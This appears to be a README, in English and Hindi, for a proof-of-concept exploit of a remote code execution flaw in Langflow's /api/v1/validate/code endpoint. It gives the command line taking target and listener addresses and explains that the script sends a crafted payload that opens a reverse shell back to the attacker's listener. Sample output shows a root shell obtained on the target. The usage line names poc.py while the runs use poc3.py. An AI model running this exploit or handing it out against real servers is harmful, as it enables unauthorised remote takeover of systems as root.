
CVE-2024-48061 Langflow vulnerable to remote code execution. Poc
python3 poc.py -i <web_ip> -p <web_port> -l <listener_ip> -lp <listener_port>
यह स्क्रिप्ट लक्ष्य वेब सर्वर पर /api/v1/validate/code पर एक संवेदनशील API एंडपॉइंट का शोषण करती है।
यह पहले संवेदनशील पथ की उपस्थिति की पुष्टि करती है, फिर निर्दिष्ट श्रोता IP और पोर्ट पर एक TCP श्रोता शुरू करती है।
एक बार श्रोता तैयार हो जाने पर, यह लक्ष्य को एक विशेष रूप से तैयार किया गया पेलोड भेजती है ताकि श्रोता से वापस जुड़ने वाला एक रिवर्स शेल उत्पन्न हो सके।
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[+] Vulnerability detected at http://192.168.0.2:7860/api/v1/validate/code
[+] Listening on 192.168.0.3:4444 ...
[+] Sending payload to http://192.168.0.2:7860/api/v1/validate/code
[+] Connection from 192.168.0.2:60440
# whoami
whoami
root
# exit
[*] Exiting shell.
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[-] Doesn't look vulnerable